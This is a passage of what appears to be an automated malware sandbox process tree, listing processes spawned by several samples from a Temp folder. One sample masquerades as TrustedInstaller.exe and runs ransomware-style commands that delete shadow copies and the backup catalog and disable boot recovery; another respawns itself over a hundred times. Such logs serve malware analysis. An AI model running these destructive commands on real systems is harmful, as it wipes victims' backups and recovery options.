C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:8312

C:\Users\Admin\AppData\Local\Temp\D227.exe
C:\Users\Admin\AppData\Local\Temp\D227.exe
1⤵
PID:1616
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe" -start
  2⤵
  PID:12880
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe" -agent 0
    3⤵
    PID:15824
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
    3⤵
    PID:15816
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      PID:17500
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
    3⤵
    PID:15808
  - - C:\Windows\SysWOW64\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:14708
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
    3⤵
    PID:15800
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    PID:15792
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
    3⤵
    PID:15784
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
    3⤵
    PID:15776
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      PID:15888
- C:\Windows\SysWOW64\notepad.exe
  notepad.exe
  2⤵
  PID:12988

C:\Users\Admin\AppData\Local\Temp\DC3A.exe
C:\Users\Admin\AppData\Local\Temp\DC3A.exe
1⤵
PID:4948
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:9804
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:11036
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:5044
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:6384
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:2332
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:9352
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:11596
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:11900
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 11900 -s 24
    3⤵
    - Program crash
    PID:12252
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:12220
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:11760
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:11472
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:8428
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:11800
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:10264
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:10868
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:10504
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:10616
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:11184
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:12240
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:12624
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:13112
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:10736
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:2108
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:12136
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:12768
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:12192
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:11648
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:12984
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:9744
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:10376
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:13348
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:13736
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:14088
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:13412
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:13628
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:10508
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:10648
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:13592
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:7652
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:13596
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:14276
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:13696
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:15156
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:15896
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:14680
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:14200
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:14420
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:15872
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:8212
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:14992
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:16508
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:16996
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:4148
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:16744
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:13504
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:11380
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:9732
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:17392
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:17440
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:17928
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:18200
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:18400
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:17604
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:12912
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:15732
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:16056
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:15696
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:18072
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:18680
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:19028
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:19404
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:5216
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:19112
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:16588
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:18584
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:14468
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:19304
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:20000
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:20452
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:15752
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:19896
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:20092
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:19608
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:19520
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:17912
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:20288
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:19516
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:18740
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:20624
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:20940
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:21232
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:20536
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:17128
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:21336
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:19516
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:11488
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:20872
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:20920
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:19796
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:13764
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:21648
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:21996
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:22320
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:20116
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:21840
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:22124
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:20748
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:21520
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:14488
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:22276
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:1012
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:21884
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:22544
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:22880
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:23224
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:23508
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:22980
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:21596
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:23004
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:23368
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:22804
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:22044
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:17096
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:23680
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:24016
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:24524
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:23956
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:24572
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:9728
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:24196
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:24740
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:25028
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:25360
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:24652
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:25076
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:25536
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:22292
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:25324
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:23504
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:21028
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:25556
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:23676
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:25996
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:26268
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:26548
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:25808
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:26516
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:25860
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:26360
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:26328
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:25624
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:26804
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:27132
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:27424
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:10008
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:5532
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:27456
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:24752
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:27504
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:26972
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:23360
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:26864
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:25936
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:27828
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:28028
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:28316
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:6456
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:28224
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:28480
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:26576
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:27364
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:14760
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:27788
- C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  C:\Users\Admin\AppData\Local\Temp\DC3A.exe
  2⤵
  PID:26528

C:\Users\Admin\AppData\Local\Temp\F030.exe
C:\Users\Admin\AppData\Local\Temp\F030.exe
1⤵
PID:11048
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe"
  2⤵
  PID:8484

C:\Users\Admin\AppData\Local\Temp\A32.exe
C:\Users\Admin\AppData\Local\Temp\A32.exe
1⤵
PID:11132

C:\Users\Admin\AppData\Local\Temp\F72.exe
C:\Users\Admin\AppData\Local\Temp\F72.exe
1⤵
PID:10180
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
  2⤵
  PID:7468
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
  2⤵
  PID:10484
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
  2⤵
  PID:10592
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
  2⤵
  PID:2888
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
  2⤵
  PID:7668

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2040

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:6620

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:9940

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:10724

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6764

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:340

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:11044

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
